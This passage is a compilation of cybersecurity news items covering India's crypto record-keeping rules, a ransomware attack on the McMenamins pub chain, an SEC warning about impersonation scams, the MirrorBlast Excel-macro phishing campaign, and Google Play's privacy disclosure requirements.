The guidelines also require virtual asset service, exchange, and custodian wallet providers to preserve records on Know Your Customer (KYC) and financial transactions for a period of five years, starting in 60 days.

India's Ministry of Electronics and Information Technology (MeitY) said in a statement, "These directions shall enhance overall cyber security posture and ensure safe and trusted Internet in the country."

McMenamins Struck by Ransomware Attack, Employee Data at Risk

 

McMenamins, a Portland hotel and brewpub chain, was struck by a ransomware attack on Wednesday that may have stolen employees' personal information, but no customer payment information seems to have been compromised. 

The ransomware attack was discovered and stopped on December 12, according to McMenamins. The company stated it alerted the FBI and contacted a cybersecurity firm to figure out where the attack came from and how extensive it was. 

Employee data such as names, residences, dates of birth, Social Security numbers, direct deposit bank account information, and benefits records may have been acquired, according to the firm in a news release, but "it is not currently known whether that is the case." 

"To provide employees with peace of mind, McMenamins will be offering employees identity and credit protection services, as well as a dedicated helpline through Experian," the company stated. "A payment processing service manages the collection of such information. Further, this information is not stored on company computer systems impacted by the attack."  

Many operational systems have been taken offline, including credit card scanners, necessitating temporary alterations in payment procedures at some McMenamins sites. There is "no indication" that consumer payment data has been hacked, according to the firm. 

The co-owner, Brian McMenamin stated, “What makes this breach especially disheartening is that it further adds to the strain and hardship our employees have been through in the past two years.” 

“We ask that our customers give our employees extra grace as we make temporary adjustments in the way we process transactions and reservations, given the impacts to our systems by this breach.” 

The company stated that it is unclear when the problem would be rectified and systems restored. There are a few things firms can do to assist mitigate these attacks, according to Kerry Tomlinson, a cyber news reporter with Ampere News. 

"As a business, you need to have backups," Tomlinson said. "If ransomware hits and they're demanding ransom for you to get your files back, you can say thanks a lot but I already have backups." 

"It will happen more and more and it's only going to get bigger. If you're not paying attention now, you need to pay attention." 

Employees should be especially cautious to help prevent cyber assaults, according to Tomlinson, by avoiding questionable emails, setting unique passwords for each website visited, and adding a multi-factor authentication process to offer an extra layer of security. It is worth noting that despite the breach, all McMenamins locations are open.

US SEC Alerts Investors of Ongoing Fraud

 

The Securities and Exchange Commission (SEC) is alerting investors about scammers posing as SEC officials and attempting to mislead them. 

Fraudsters are contacting investors via phone calls, voicemails, emаils, and letters, according to the SEC's Office of Investor Educаtion and Advocаcy (OIE). 

The alert stated, “We аre аwаre thаt severаl individuаls recently received phone cаlls or voicemаil messаges thаt аppeаred to be from аn SEC phone number. The cаlls аnd messаges rаised purported concerns аbout unаuthorized trаnsаctions or other suspicious аctivity in the recipients’ checking or cryptocurrency аccounts. These phone cаlls аnd voicemаil messаges аre in no wаy connected to the Securities аnd Exchаnge Commission.” 

The SEC warned it never asks for payments linked to enforcement activities, offer to confirm trades, or seek sensitive personal and financial information in unsolicited communication, including emails and letters. It further stated that SEC officials will not inquire about shareholdings, account numbers, PINs, passwords, or other personal information. 

Scammers appear to be employing a growing number of strategies in order to boost their chances of success. Investors should not disclose any personal information if they get communication that seems to be from the Securities and Exchange Commission, as per the notice. They are encouraged to contact the commission directly.

Investors can use the SEC's personnel locаtor at (202) 551-6000, call (800) SEC-0330, or emаil help@SEC.gov to confirm the identity of people behind calls or messages. Investors can also register a complaint with the Securities and Exchange Commission's Office of Inspector General by visiting www.sec.gov/oig or calling (833) SEC-OIG1 (732-6441). 

Further, the alert stated, “Bewаre of government impersonаtor schemes. Con аrtists hаve used the nаmes of reаl SEC employees аnd emаil messаges thаt fаlsely аppeаr to be from the Securities аnd Exchаnge Commission to trick victims into sending the frаudster’s money. Impersonаtion of US Government аgencies аnd employees (аs well аs of legitimаte finаnciаl services entities) is one common feаture of аdvаnce fee solicitаtions аnd other frаudulent schemes. Even where the frаudsters do not request thаt funds be sent directly to them, they mаy use personаl informаtion they obtаin to steаl аn individuаl’s identity or misаppropriаte their finаnciаl аssets.”

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

MirrorBlast, a phishing effort, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making it especially risky for businesses that rely on detection-based protection and sandboxing. 

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Despite the fact that macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into allowing macros. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work. 

Microsoft earlier this year extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent phenomenon by attackers to utilise outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems. 

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions will take to the malicious Excel document. 

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued data on COVID-related modifications to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and instals an MSI package. 

Morphisec discovered two MIS installation versions that employed legal scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. It then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised. 

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 

Google: Android Apps Must Provide Privacy Information By April 2022

 


Some days back Google has announced that the company is about to launch its Google Play ‘Safety Section’ feature that will provide information regarding the data collected and used by an Android app. Now Google has announced more details about the upcoming feature. 

Under the new policy app developers have to share the details — what information apps collect, how collected data is used, and what privacy/security features the apps utilize. The upcoming feature can be used in the first quarter of 2022, this feature will display on the app itself. 

With the feature, customers will be able to see all security-privacy relating information including what data is shared with third parties, whether an app uses data encryption, follows Google's Families policies, or whether it has been independently audited against global security standards. Following the announcement, Google will also provide the timeline to App developers — when they will be able to submit information, and when customers can see the Safety section, and it has also given the deadline for App developers to provide the info data. 

What is the timeline for App Developers? 

According to Google, the policy will take place in the first week of October 2021, the "App privacy & security" will display on an app's content page on Play Console. Then Developers will be able to attempt a questionnaire on data collection, security features, and the app's privacy policy. However, the whole procedure will complete in April 2022. 

What must be disclosed under this feature? 

• Encryption in transit 
• Deletion mechanism 
• Families policy 
• Independent security review and How data collected 

Some of the data types that app developers must disclose include personal information like user name, phone number, and email address, location data like users' approximate or precise location, financial info like user credit card number and bank account number, Health and fitness information, Storage like files and docs, emails or texts, audio files like sound recordings and music files, calendar information, App performance like crash logs and performance diagnostics, and Identifiers like device id.